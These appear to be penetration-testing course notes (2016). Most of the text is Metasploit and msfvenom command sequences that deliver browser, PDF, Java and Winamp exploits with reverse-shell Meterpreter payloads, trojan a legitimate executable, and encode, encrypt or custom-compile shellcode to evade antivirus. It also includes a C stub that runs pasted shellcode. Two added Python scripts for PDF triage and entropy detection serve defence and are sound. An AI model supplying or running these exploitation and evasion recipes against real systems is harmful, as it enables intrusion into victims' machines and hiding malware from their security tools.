Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary

(1) Client Side Exploits: Browser Attacks

msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating

PrependMigrate makes the payload move to a new process as soon as it runs, so the session survives if the browser crashes or is closed:

msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec: service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444

(4) PDF Embedded Executable

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /usr/share/set/readme/User_Manual.pdf
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.9
msf exploit(adobe_pdf_embedded_exe) > exploit

(5) Java Exploits

msf > use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean) > set SRVHOST 192.168.20.9
msf exploit(java_jre17_jmxbean) > set SRVPORT 80
msf exploit(java_jre17_jmxbean) > set URIPATH javaexploit
msf exploit(java_jre17_jmxbean) > show payloads
msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_http

(6) Java Applets

msf exploit(java_jre17_jmxbean) > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > set APPLETNAME [APPNAME]
msf exploit(java_signed_applet) > set SRVHOST 192.168.20.9
msf exploit(java_signed_applet) > set SRVPORT 80

(7) Browser Autopwn

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf auxiliary(browser_autopwn) > set URIPATH autopwn
URIPATH => autopwn
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] --- Done, found 16 exploit modules
[*] Using URL: http://0.0.0.0:8080/autopwn
[*] Local IP: http://192.168.20.9:8080/autopwn
[*] Server started.
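The two PDF modules in sections (3) and (4) leave static traces in the document they produce: adobe_utilprintf reaches its bug from the document's JavaScript, and adobe_pdf_embedded_exe attaches an executable to an existing PDF. The script below is an added defender-side example, not part of the course notes or of Metasploit. It scans the raw bytes of a PDF for the name objects that indicate script execution, attachments or auto-run actions, decoding the #xx hex escapes the PDF format allows inside names so that an obfuscated spelling such as /J#61vaScript is still counted. The three sample PDFs are constructed inline and are only skeletons, not working documents.

```python
import re
from collections import Counter

# PDF name objects a defender looks for when triaging a document statically:
#   /JavaScript, /JS   script execution (the util.printf bug is reached from document JavaScript)
#   /EmbeddedFile      an attached file (adobe_pdf_embedded_exe attaches an executable this way)
#   /Launch            an action that runs an external file or program
#   /OpenAction, /AA   actions that fire automatically on open or on page/annotation events
RISKY_NAMES = {"/JavaScript", "/JS", "/EmbeddedFile", "/Launch", "/OpenAction", "/AA"}

# A PDF name runs from '/' up to the next whitespace or delimiter character.
_NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")


def normalize_name(raw: bytes) -> str:
    """Decode the #xx hex escapes PDF allows inside names, so /J#61vaScript -> /JavaScript."""
    decoded = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Count risky name objects in the raw bytes of a PDF.

    Limitation: objects inside compressed streams (e.g. /FlateDecode) are not visible to
    this scan, so the result only reports that such streams exist.
    """
    counts = Counter()
    for match in _NAME_RE.finditer(data):
        name = normalize_name(match.group(0))
        if name in RISKY_NAMES:
            counts[name] += 1
    return {
        "risky": dict(counts),
        "has_compressed_streams": b"/FlateDecode" in data,
        "suspicious": bool(counts),
    }


# Constructed samples (not real exploit documents): minimal PDF skeletons with the relevant objects.
SAMPLE_BENIGN = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_AUTORUN_JS = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Type /Action /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_ATTACHMENT = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Names << /EmbeddedFiles << /Names [(attachment.exe) 4 0 R] >> >> >> endobj\n"
    b"4 0 obj << /Type /Filespec /F (attachment.exe) /EF << /F 5 0 R >> >> endobj\n"
    b"5 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length 0 >> stream\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("benign", SAMPLE_BENIGN), ("autorun js", SAMPLE_AUTORUN_JS),
                       ("attachment", SAMPLE_ATTACHMENT)):
        print(label, triage_pdf(pdf))
```

The scan is deliberately shallow: it works on raw bytes, so a document whose action dictionaries sit inside a compressed object stream will only report has_compressed_streams. A hit on /OpenAction together with /JavaScript, or on /EmbeddedFile at all, is the cue to open the file in a sandbox or decompress the streams with a proper PDF parser before deciding anything.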
(8) Winamp Skin Example

msf > use exploit/windows/fileformat/winamp_maki_bof
msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(winamp_maki_bof) > set LHOST 192.168.20.9
msf exploit(winamp_maki_bof) > exploit

Social Engineering

setoolkit

Trojans

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe

-x  use an existing executable as the template for the output file
-k  keep the template's original functionality and run the shellcode in a new thread

Metasploit Encoding

We can also run our shellcode through an encoder to obfuscate it. List the available encoders, then choose one with -e and set the number of encoding iterations with -i:

msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe

Multi-Encoding

Write the first pass out as raw shellcode, then feed it back to msfvenom on standard input (-p -) and encode it again with a different encoder:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw > meterpreterencoded.bin
msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin

Combining Techniques

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe

Custom Compiling

custommeterpreter.c:

#include <stdio.h>

/* Random filler generated in the "Creating Randomness" step; it changes the file's bytes
   without changing its behaviour. Paste the generated string here. */
unsigned char random[] = "";

/* Shellcode in C array format generated in the "Creating Shellcode" step. Paste it here. */
unsigned char shellcode[] = "";

int main(void)
{
    /* Cast the shellcode buffer to a function pointer and call it. */
    ((void (*)())shellcode)();
    return 0;
}

Creating Shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5

Creating Randomness:

cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512

Compiling:

i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c

Hyperion

Encrypts the executable with AES and throws away the key (the decryption stub recovers it by brute force at run time).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe
cd Hyperion-1.0/
wine ../hyperion.exe ../meterpreter.exe bypassavhyperion.exe

Veil

Framework for using different techniques to bypass antivirus.

cd Veil-Evasion-master
./Veil-Evasion.py
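The encoding, multi-encoding and Hyperion steps above all rewrite the bytes of the same Meterpreter payload, which is exactly why a byte-signature match on the original payload stops firing. What those transformations cannot hide is that encrypted or heavily encoded data is statistically unlike ordinary code and data. The script below is an added defender-side example, not part of the course notes or of msfvenom, Hyperion or Veil: it measures Shannon entropy over fixed windows of a file image and flags the regions that look encrypted. The sample regions are constructed inline with a fixed seed. It also shows a caveat that follows from the custom-compiling step: the random A-Za-z0-9 filler is drawn from only 62 symbols, so it stays below 6 bits per byte and does not by itself trip the check.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated value, 8.0 for a uniform spread over all 256 values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 512, threshold: float = 7.0) -> list:
    """Scan data in fixed windows and return (offset, entropy) for every window at or above threshold.

    A short tail (less than half a window) is skipped because its estimate is unreliable.
    """
    hits = []
    for offset in range(0, len(data), window):
        chunk = data[offset:offset + window]
        if len(chunk) < window // 2:
            break
        entropy = shannon_entropy(chunk)
        if entropy >= threshold:
            hits.append((offset, round(entropy, 2)))
    return hits


# Constructed sample data with a fixed seed, so the numbers are reproducible.
_rng = random.Random(1234)
# Ordinary code/data-like content: few distinct byte values, low entropy (32 bytes x 64 = 2048).
PLAIN_REGION = b"Ordinary program text and data. " * 64
# Stand-in for an AES-encrypted or multiply-encoded payload body: uniform random bytes.
ENCRYPTED_LIKE = bytes(_rng.getrandbits(8) for _ in range(2048))
# The A-Za-z0-9 filler from the custom-compiling step: random, but drawn from only 62 symbols.
ALNUM_FILLER = bytes(_rng.choice(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
                     for _ in range(512))
# A file image with the encrypted-looking blob sandwiched between two ordinary regions.
SAMPLE_IMAGE = PLAIN_REGION + ENCRYPTED_LIKE + PLAIN_REGION


def report(data: bytes = SAMPLE_IMAGE) -> list:
    """Return the windows a defender would pull aside for closer inspection."""
    return high_entropy_windows(data)


if __name__ == "__main__":
    print("plain region entropy:    %.2f" % shannon_entropy(PLAIN_REGION))
    print("alnum filler entropy:    %.2f (cannot exceed log2(62) = %.2f)"
          % (shannon_entropy(ALNUM_FILLER), math.log2(62)))
    print("encrypted-like entropy:  %.2f" % shannon_entropy(ENCRYPTED_LIKE))
    print("flagged windows in image:", report())
```

Entropy is a triage signal, not a verdict: compressed resources, embedded certificates and legitimately packed executables score just as high, so a flagged window means "look at this region in a sandbox or a disassembler", while a clean scan means only that nothing in the file looks encrypted at this window size.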
Author: Vitali Kremez
July 2016